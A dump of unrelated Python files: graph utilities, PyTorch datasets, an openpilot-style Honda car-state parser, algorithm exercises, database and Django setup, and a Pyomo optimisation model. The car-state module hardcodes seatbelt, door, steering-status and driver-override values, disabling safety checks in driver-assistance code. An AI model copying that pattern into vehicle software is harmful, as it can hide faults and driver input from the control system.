N_vec.append(W.dot(N_vec[-1]) - D_I.dot(N_vec[-2]))
M_vec.append(X.transpose().dot(N_vec[-1]))
return M_vec
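# Small worked example (a path graph on 3 nodes with 2 classes, all nodes labeled):
# with W = [[0,1,0],[1,0,1],[0,1,0]] and X = [[1,0],[0,1],[1,0]], M_observed(W, X, distance=2)
# returns [M0, M1, M2] with M1 = X^T W X = [[0,2],[2,0]] (class pairs across edges) and,
# with NB=True, M2 = [[2,0],[0,0]] since only the non-backtracking length-2 paths 0-1-2 and
# 2-1-0 (both class 0 to class 0) are counted.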
|
#!/usr/bin/env python
import json
import torch
import pdb
import numpy as np
import pandas as pd
from torch.utils.data import Dataset
from .vectorizer import MLPVectorizer, CNNVectorizer
class PDataset(Dataset):
"""
DataSet derived from PyTorch's Dataset class
"""
def __init__(self, df: pd.DataFrame, vectorizer) -> None:
self.df = df
self.df_size = len(self.df)
self._vectorizer = vectorizer
@classmethod
def load_data_and_vectorizer(cls, df: pd.DataFrame, vectorizer_path: str):
"""
Load dataset and the corresponding vectorizer. Used in the case the
vectorizer has been cached for re-use
Args:
            df: the dataset as a pandas DataFrame
vectorizer_path: path to the saved vectorizer file
"""
vectorizer = cls.load_vectorizer(vectorizer_path)
return cls(df, vectorizer)
def save_vectorizer(self, vectorizer_path: str) -> None:
"""
Saves the vectorizer to disk using json
Args:
            vectorizer_path: path to save the vectorizer file
"""
with open(vectorizer_path, 'w') as f:
json.dump(self._vectorizer.to_serializeable(), f)
def get_vectorizer(self):
return self._vectorizer
def __len__(self) -> int:
return self.df_size
def get_num_batches(self, batch_size: int) -> int:
"""
Given a batch size, return the number of batches in the dataset
"""
return len(self) // batch_size
class CNNDataset(PDataset):
def __init__(self, df, vectorizer):
super(CNNDataset, self).__init__(df, vectorizer)
@staticmethod
def load_vectorizer(vectorizer_path: str) -> CNNVectorizer:
"""
A static method for loading the vectorizer from file
Args:
vectorizer_path: path to the saved vectorizer file
"""
with open(vectorizer_path) as f:
return CNNVectorizer.from_serializable(json.load(f))
@classmethod
def load_data_and_create_vectorizer(cls, df: pd.DataFrame):
"""
Load dataset and create a new Vectorizer object
Args:
            df: the dataset as a pandas DataFrame
Returns:
an instance of Vectorizer
"""
return cls(df, CNNVectorizer.from_dataframe(df))
def __getitem__(self, idx: int) -> tuple:
"""
The primary entry point method for PyTorch datasets
Args:
idx: the index to the data point
Returns:
a tuple holding the data point's features and label target
"""
row = self.df.iloc[idx]
surname_matrix = np.asarray(self._vectorizer.vectorize(row['surname']), dtype=np.float32)
nationality_idx = np.asarray(self._vectorizer.nationality_vocab.lookup_token(
row['nationality']), dtype=np.int64)
return (surname_matrix, nationality_idx)
class MLPDataset(PDataset):
def __init__(self, df, vectorizer):
super(MLPDataset, self).__init__(df, vectorizer)
@staticmethod
def load_vectorizer(vectorizer_path: str) -> MLPVectorizer:
"""
A static method for loading the vectorizer from file
Args:
vectorizer_path: path to the saved vectorizer file
"""
with open(vectorizer_path) as f:
return MLPVectorizer.from_serializable(json.load(f))
@classmethod
def load_data_and_create_vectorizer(cls, df: pd.DataFrame):
"""
Load dataset and create a new Vectorizer object
Args:
            df: the dataset as a pandas DataFrame
Returns:
an instance of Vectorizer
"""
return cls(df, MLPVectorizer.from_dataframe(df))
def __getitem__(self, idx: int) -> tuple:
"""
The primary entry point method for PyTorch datasets
Args:
idx: the index to the data point
Returns:
a tuple holding the data point's features and label target
"""
row = self.df.iloc[idx]
surname_vector = np.asarray(self._vectorizer.vectorize(row['surname']), dtype=np.float32)
nationality_idx = np.asarray(self._vectorizer.nationality_vocab.lookup_token(
row['nationality']), dtype=np.int64)
return (surname_vector, nationality_idx)
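# Usage sketch (illustrative; assumes a DataFrame with 'surname' and 'nationality' columns and
# a hypothetical CSV path):
#
#     from torch.utils.data import DataLoader
#     df = pd.read_csv('surnames.csv')
#     dataset = MLPDataset.load_data_and_create_vectorizer(df)
#     dataset.save_vectorizer('vectorizer.json')          # cache the vectorizer for re-use
#     loader = DataLoader(dataset, batch_size=32, shuffle=True)
#     for surname_vector, nationality_idx in loader:
#         pass                                            # feed the batch to a model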
|
from cereal import car
from collections import defaultdict
from common.numpy_fast import interp
from common.kalman.simple_kalman import KF1D
from opendbc.can.can_define import CANDefine
from opendbc.can.parser import CANParser
from selfdrive.config import Conversions as CV
from selfdrive.car.honda.values import CAR, DBC, STEER_THRESHOLD, SPEED_FACTOR, HONDA_BOSCH
GearShifter = car.CarState.GearShifter
def parse_gear_shifter(gear, vals):
val_to_capnp = {'P': GearShifter.park, 'R': GearShifter.reverse, 'N': GearShifter.neutral,
'D': GearShifter.drive, 'S': GearShifter.sport, 'L': GearShifter.low}
try:
return val_to_capnp[vals[gear]]
except KeyError:
return "unknown"
def calc_cruise_offset(offset, speed):
  # heuristic formula so that speed is controlled to ~ 0.3m/s below pid_speed
# constraints to solve for _K0, _K1, _K2 are:
# - speed = 0m/s, out = -0.3
# - speed = 34m/s, offset = 20, out = -0.25
# - speed = 34m/s, offset = -2.5, out = -1.8
_K0 = -0.3
_K1 = -0.01879
_K2 = 0.01013
return min(_K0 + _K1 * speed + _K2 * speed * offset, 0.)
def get_can_signals(CP):
# this function generates lists for signal, messages and initial values
signals = [
("XMISSION_SPEED", "ENGINE_DATA", 0),
("WHEEL_SPEED_FL", "WHEEL_SPEEDS", 0),
("WHEEL_SPEED_FR", "WHEEL_SPEEDS", 0),
("WHEEL_SPEED_RL", "WHEEL_SPEEDS", 0),
("WHEEL_SPEED_RR", "WHEEL_SPEEDS", 0),
("STEER_ANGLE", "STEERING_SENSORS", 0),
("STEER_ANGLE_RATE", "STEERING_SENSORS", 0),
#("STEER_TORQUE_SENSOR", "STEER_STATUS", 0),
#("STEER_TORQUE_MOTOR", "STEER_STATUS", 0),
("LEFT_BLINKER", "SCM_FEEDBACK", 0),
("RIGHT_BLINKER", "SCM_FEEDBACK", 0),
#("GEAR", "GEARBOX", 0),
#("SEATBELT_DRIVER_LAMP", "SEATBELT_STATUS", 1),
#("SEATBELT_DRIVER_LATCHED", "SEATBELT_STATUS", 0),
("BRAKE_PRESSED", "POWERTRAIN_DATA", 0),
#("BRAKE_SWITCH", "POWERTRAIN_DATA", 0),
("CRUISE_BUTTONS", "SCM_BUTTONS", 0),
("MAIN_ON", "SCM_BUTTONS", 0),
#("ESP_DISABLED", "VSA_STATUS", 1),
#("USER_BRAKE", "VSA_STATUS", 0),
#("BRAKE_HOLD_ACTIVE", "VSA_STATUS", 0),
#("STEER_STATUS", "STEER_STATUS", 5),
#("GEAR_SHIFTER", "GEARBOX", 0),
("PEDAL_GAS", "POWERTRAIN_DATA", 0),
("CRUISE_SETTING", "SCM_BUTTONS", 0),
("CRUISE_SPEED_PCM", "CRUISE", 0 ),
#("ACC_STATUS", "POWERTRAIN_DATA", 0),
]
checks = [
# ("ENGINE_DATA", 100),
# ("WHEEL_SPEEDS", 50),
# ("STEERING_SENSORS", 100),
# ("SEATBELT_STATUS", 10),
# ("CRUISE", 10),
# ("POWERTRAIN_DATA", 100),
# ("VSA_STATUS", 50),
]
return signals, checks
def get_can_parser(CP):
signals, checks = get_can_signals(CP)
  bus_pt = 1 if CP.isPandaBlack and CP.carFingerprint not in HONDA_BOSCH else 0
return CANParser(DBC[CP.carFingerprint]['pt'], signals, checks, bus_pt)
def get_cam_can_parser(CP):
signals = []
checks = []
# all hondas except CRV, RDX and 2019 Odyssey@China use 0xe4 for steering
#checks = [(0x158, 100)]
#if CP.carFingerprint in [CAR.CRV, CAR.ACURA_RDX, CAR.ODYSSEY_CHN]:
# checks = [(0x194, 100)]
bus_cam = 0 # if CP.carFingerprint in HONDA_BOSCH and not CP.isPandaBlack else 2
return CANParser(DBC[CP.carFingerprint]['pt'], signals, checks, bus_cam)
class CarState():
def __init__(self, CP):
self.CP = CP
self.can_define = CANDefine(DBC[CP.carFingerprint]['pt'])
#self.shifter_values = self.can_define.dv["GEARBOX"]["GEAR_SHIFTER"]
self.steer_status_values = defaultdict(lambda: "UNKNOWN", self.can_define.dv["STEER_STATUS"]["STEER_STATUS"])
self.user_gas, self.user_gas_pressed = 0., 0
self.brake_switch_prev = 0
self.brake_switch_ts = 0
self.cruise_buttons = 0
self.cruise_setting = 0
self.v_cruise_pcm_prev = 0
self.blinker_on = 0
self.left_blinker_on = 0
self.right_blinker_on = 0
self.cruise_mode = 0
self.stopped = 0
# vEgo kalman filter
dt = 0.01
# Q = np.matrix([[10.0, 0.0], [0.0, 100.0]])
# R = 1e3
self.v_ego_kf = KF1D(x0=[[0.0], [0.0]],
A=[[1.0, dt], [0.0, 1.0]],
C=[1.0, 0.0],
K=[[0.12287673], [0.29666309]])
self.v_ego = 0.0
def update(self, cp, cp_cam):
# car params
v_weight_v = [0., 1.] # don't trust smooth speed at low values to avoid premature zero snapping
v_weight_bp = [1., 6.] # smooth blending, below ~0.6m/s the smooth speed snaps to zero
# update prevs, update must run once per loop
self.prev_cruise_buttons = self.cruise_buttons
self.prev_cruise_setting = self.cruise_setting
self.prev_blinker_on = self.blinker_on
self.prev_left_blinker_on = self.left_blinker_on
self.prev_right_blinker_on = self.right_blinker_on
# ******************* parse out can *******************
self.door_all_closed = True # not any([cp.vl["DOORS_STATUS"]['DOOR_OPEN_FL'], cp.vl["DOORS_STATUS"]['DOOR_OPEN_FR'],
# cp.vl["DOORS_STATUS"]['DOOR_OPEN_RL'], cp.vl["DOORS_STATUS"]['DOOR_OPEN_RR']])
self.seatbelt = True #not cp.vl["SEATBELT_STATUS"]['SEATBELT_DRIVER_LAMP'] and cp.vl["SEATBELT_STATUS"]['SEATBELT_DRIVER_LATCHED']
steer_status = 'NORMAL' #self.steer_status_values[0]#cp.vl["STEER_STATUS"]['STEER_STATUS']]
self.steer_error = steer_status not in ['NORMAL', 'NO_TORQUE_ALERT_1', 'NO_TORQUE_ALERT_2', 'LOW_SPEED_LOCKOUT', 'TMP_FAULT']
# NO_TORQUE_ALERT_2 can be caused by bump OR steering nudge from driver
self.steer_not_allowed = steer_status not in ['NORMAL', 'NO_TORQUE_ALERT_2']
# LOW_SPEED_LOCKOUT is not worth a warning
self.steer_warning = steer_status not in ['NORMAL', 'LOW_SPEED_LOCKOUT', 'NO_TORQUE_ALERT_2']
self.brake_error = 0
# calc best v_ego estimate, by averaging two opposite corners
speed_factor = SPEED_FACTOR[self.CP.carFingerprint]
self.v_wheel_fl = cp.vl["WHEEL_SPEEDS"]['WHEEL_SPEED_FL'] * CV.KPH_TO_MS * speed_factor
self.v_wheel_fr = cp.vl["WHEEL_SPEEDS"]['WHEEL_SPEED_FR'] * CV.KPH_TO_MS * speed_factor
self.v_wheel_rl = cp.vl["WHEEL_SPEEDS"]['WHEEL_SPEED_RL'] * CV.KPH_TO_MS * speed_factor
self.v_wheel_rr = cp.vl["WHEEL_SPEEDS"]['WHEEL_SPEED_RR'] * CV.KPH_TO_MS * speed_factor
v_wheel = (self.v_wheel_fl + self.v_wheel_fr + self.v_wheel_rl + self.v_wheel_rr)/4.
# blend in transmission speed at low speed, since it has more low speed accuracy
self.v_weight = interp(v_wheel, v_weight_bp, v_weight_v)
speed = (1. - self.v_weight) * cp.vl["ENGINE_DATA"]['XMISSION_SPEED'] * CV.KPH_TO_MS * speed_factor + \
self.v_weight * v_wheel
if abs(speed - self.v_ego) > 2.0: # Prevent large accelerations when car starts at non zero speed
self.v_ego_kf.x = [[speed], [0.0]]
self.v_ego_raw = speed
v_ego_x = self.v_ego_kf.update(speed)
self.v_ego = float(v_ego_x[0])
self.a_ego = float(v_ego_x[1])
self.standstill = self.v_ego_raw < 0.01 #not cp.vl["STANDSTILL"]['WHEELS_MOVING']
self.pedal_gas = cp.vl["POWERTRAIN_DATA"]['PEDAL_GAS']
# this is a hack for the interceptor. This is now only used in the simulation
# TODO: Replace tests by toyota so this can go away
if self.CP.enableGasInterceptor:
self.user_gas = (cp.vl["GAS_SENSOR"]['INTERCEPTOR_GAS'] + cp.vl["GAS_SENSOR"]['INTERCEPTOR_GAS2']) / 2.
self.user_gas_pressed = self.user_gas > 0 # this works because interceptor read < 0 when pedal position is 0. Once calibrated, this will change
self.user_gas_pressed = self.pedal_gas > 0
#self.gear = 0 if self.CP.carFingerprint == CAR.CIVIC else cp.vl["GEARBOX"]['GEAR']
self.angle_steers = cp.vl["STEERING_SENSORS"]['STEER_ANGLE']
self.angle_steers_rate = cp.vl["STEERING_SENSORS"]['STEER_ANGLE_RATE']
self.cruise_setting = cp.vl["SCM_BUTTONS"]['CRUISE_SETTING']
self.cruise_buttons = cp.vl["SCM_BUTTONS"]['CRUISE_BUTTONS']
self.blinker_on = cp.vl["SCM_FEEDBACK"]['LEFT_BLINKER'] or cp.vl["SCM_FEEDBACK"]['RIGHT_BLINKER']
self.left_blinker_on = cp.vl["SCM_FEEDBACK"]['LEFT_BLINKER']
self.right_blinker_on = cp.vl["SCM_FEEDBACK"]['RIGHT_BLINKER']
#self.brake_hold = cp.vl["VSA_STATUS"]['BRAKE_HOLD_ACTIVE']
self.park_brake = 0 # TODO
self.main_on = cp.vl["SCM_BUTTONS"]['MAIN_ON']
#can_gear_shifter = int(cp.vl["GEARBOX"]['GEAR_SHIFTER'])
self.gear_shifter = 'drive' #parse_gear_shifter(can_gear_shifter, self.shifter_values)
self.car_gas = cp.vl["POWERTRAIN_DATA"]['PEDAL_GAS']
self.steer_torque_driver = 0 #cp.vl["STEER_STATUS"]['STEER_TORQUE_SENSOR']
self.steer_torque_motor = 0 #cp.vl["STEER_STATUS"]['STEER_TORQUE_MOTOR']
self.steer_override = False #abs(self.steer_torque_driver) > STEER_THRESHOLD[self.CP.carFingerprint]
#self.brake_switch = cp.vl["POWERTRAIN_DATA"]['BRAKE_SWITCH']
#self.cruise_speed_offset = calc_cruise_offset(cp.vl["CRUISE_PARAMS"]['CRUISE_SPEED_OFFSET'], self.v_ego)
self.v_cruise_pcm = cp.vl["CRUISE"]['CRUISE_SPEED_PCM']
self.brake_pressed = cp.vl["POWERTRAIN_DATA"]['BRAKE_PRESSED']
self.user_brake = 0 #cp.vl["VSA_STATUS"]['USER_BRAKE']
#self.pcm_acc_status = cp.vl["POWERTRAIN_DATA"]['ACC_STATUS']
|
class Solution:
# @param A : head node of linked list
# @param B : integer
# @return the head node in the linked list
def partition(self, A, B):
head0 = None
tail0 = None
head1 = None
tail1 = None
ptr = A
while ptr is not None :
ptr2 = ptr.next
ptr.next = None
if ptr.val < B :
if head0 is None :
head0 = ptr
tail0 = ptr
else :
tail0.next = ptr
tail0 = ptr
else :
if head1 is None :
head1 = ptr
tail1 = ptr
else :
tail1.next = ptr
tail1 = ptr
ptr = ptr2
if tail0 is not None :
tail0.next = head1
return head0 if head0 is not None else head1
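# Example (assumes the usual singly linked ListNode with .val and .next):
# partition(1 -> 4 -> 3 -> 2 -> 5 -> 2, B=3) walks the list once, appending nodes with
# val < 3 to one chain and the rest to another, then links the two chains:
#     result: 1 -> 2 -> 2 -> 4 -> 3 -> 5   (relative order within each chain is preserved)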
|
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
SQLALCHEMY_DATABASE_URI = 'sqlite:///todolist.sqlite'
_engine = create_engine(
SQLALCHEMY_DATABASE_URI, connect_args={"check_same_thread": False}
)
_session_local = sessionmaker(autocommit=False, autoflush=False, bind=_engine)
_base = declarative_base()
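# Minimal usage sketch (assumptions: a hypothetical 'Todo' model; standard SQLAlchemy
# declarative/session API):
#
#     from sqlalchemy import Column, Integer, String
#
#     class Todo(_base):
#         __tablename__ = 'todos'
#         id = Column(Integer, primary_key=True, index=True)
#         title = Column(String, nullable=False)
#
#     _base.metadata.create_all(bind=_engine)   # create the tables in todolist.sqlite
#     db = _session_local()
#     db.add(Todo(title='write docs'))
#     db.commit()
#     db.close()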
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Management command entry point for working with migrations
"""
import sys
import django
from django.conf import settings
INSTALLED_APPS = [
"django.contrib.auth",
"django.contrib.admin",
"django.contrib.contenttypes",
"django.contrib.sites",
"addendum",
]
try:
import south # noqa
except ImportError:
pass
else:
INSTALLED_APPS += ['south']
settings.configure(
DEBUG=True,
USE_TZ=True,
USE_I18N=True,
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
},
MIDDLEWARE_CLASSES=(), # Silence Django 1.7 warnings
SITE_ID=1,
FIXTURE_DIRS=['tests/fixtures'],
INSTALLED_APPS=INSTALLED_APPS,
ROOT_URLCONF="tests.urls",
)
try:
django.setup()
except AttributeError:
pass
if __name__ == '__main__':
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
# BOJ 15683
# surveillance
from copy import deepcopy
import sys
sys.setrecursionlimit(100000)
dx = (0, 1, 0, -1)
dy = (1, 0, -1, 0)
dir = [[], [[0], [1], [2], [3]], [[0, 2], [1, 3]], [[1, 0], [1, 2], [3, 0], [3, 2]], [[0, 1, 2], [1, 2, 3], [0, 2, 3],[0, 1, 3]], [[0, 1, 2, 3]]]
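# dir[t] lists the candidate orientations for CCTV type t; each orientation is the set of
# direction indices the camera covers (0: right, 1: down, 2: left, 3: up, per dx/dy above).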
n, m = map(int, input().split())
office = []
cctv = []
total_cctv = 0
for i in range(n):
office.append(list(map(int, input().split())))
for j in range(m):
if office[i][j] != 0 and office[i][j] != 6:
total_cctv += 1
cctv.append([i, j])
res = 1e9
def safe(cctv_map):
score = 0
for i in range(n):
for j in range(m):
if cctv_map[i][j] == 0:
score += 1
return score
def surveil(x, y, d, target_map):
for i in d:
nx = x
ny = y
while True:
nx += dx[i]
ny += dy[i]
if 0 <= nx < n and 0 <= ny < m:
if target_map[nx][ny] == 0:
target_map[nx][ny] = 7
elif target_map[nx][ny] == 6:
break
else:
break
def dfs(cnt, office_now):
global res
tmp = deepcopy(office_now)
if cnt == total_cctv:
res = min(res, safe(tmp))
return
x, y = cctv[cnt]
for d in dir[office[x][y]]:
surveil(x, y, d, tmp)
dfs(cnt+1, tmp)
tmp = deepcopy(office_now)
dfs(0, office)
print(res)
|
# MINLP written by GAMS Convert at 04/21/18 13:51:42
#
# Equation counts
# Total E G L N X C B
# 215 33 149 33 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 154 62 92 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 742 713 29 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
m.x1 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x2 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x3 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x4 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x5 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x6 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x7 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x8 = Var(within=Reals,bounds=(4.60517018598809,8.00636756765025),initialize=4.60517018598809)
m.x9 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x10 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x11 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x12 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x13 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x14 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x15 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x16 = Var(within=Reals,bounds=(1.6094379124341,6.90775527898214),initialize=4.25859659570812)
m.x17 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x18 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x19 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x20 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x21 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x22 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x23 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x24 = Var(within=Reals,bounds=(1.6094379124341,6.84321675784456),initialize=4.22632733513933)
m.x25 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x26 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x27 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x28 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x29 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x30 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x31 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x32 = Var(within=Reals,bounds=(2.30258509299405,6.84321675784456),initialize=4.57290092541931)
m.x33 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x34 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x35 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x36 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x37 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x38 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x39 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x40 = Var(within=Reals,bounds=(1.6094379124341,6.62007320653036),initialize=4.11475555948223)
m.x41 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x42 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x43 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x44 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x45 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x46 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x47 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x48 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0)
m.x49 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x50 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x51 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x52 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x53 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x54 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x55 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x56 = Var(within=Reals,bounds=(0,1.38629436111989),initialize=0.693147180559945)
m.x58 = Var(within=Reals,bounds=(4.60517018598809,9.61580548008435),initialize=7.11048783303622)
m.x59 = Var(within=Reals,bounds=(None,100),initialize=0)
m.x60 = Var(within=Reals,bounds=(None,100),initialize=0)
m.x61 = Var(within=Reals,bounds=(None,100),initialize=0)
m.x62 = Var(within=Reals,bounds=(None,100),initialize=0)
m.b63 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b64 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b65 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b66 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b67 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b68 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b69 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b70 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b71 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b72 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b73 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b74 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b75 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b76 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b77 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b78 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b79 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b80 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b81 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b82 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b83 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b84 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b85 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b86 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b87 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b88 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b89 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b90 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b91 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b92 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b93 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b94 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b95 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b96 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b97 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b98 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b99 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b100 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b101 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b102 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b103 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b104 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b105 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b106 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b107 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b108 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b109 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b110 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b111 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b112 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b113 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b114 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b115 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b116 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b117 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b118 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b119 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b120 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b121 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b122 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b123 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b124 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b125 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b126 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b127 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b128 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b129 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b130 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b131 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b132 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b133 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b134 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b135 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b136 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b137 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b138 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b139 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b140 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b141 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b142 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b143 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b144 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b145 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b146 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b147 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b148 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b149 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b150 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b151 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b152 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b153 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b154 = Var(within=Binary,bounds=(0,1),initialize=0)
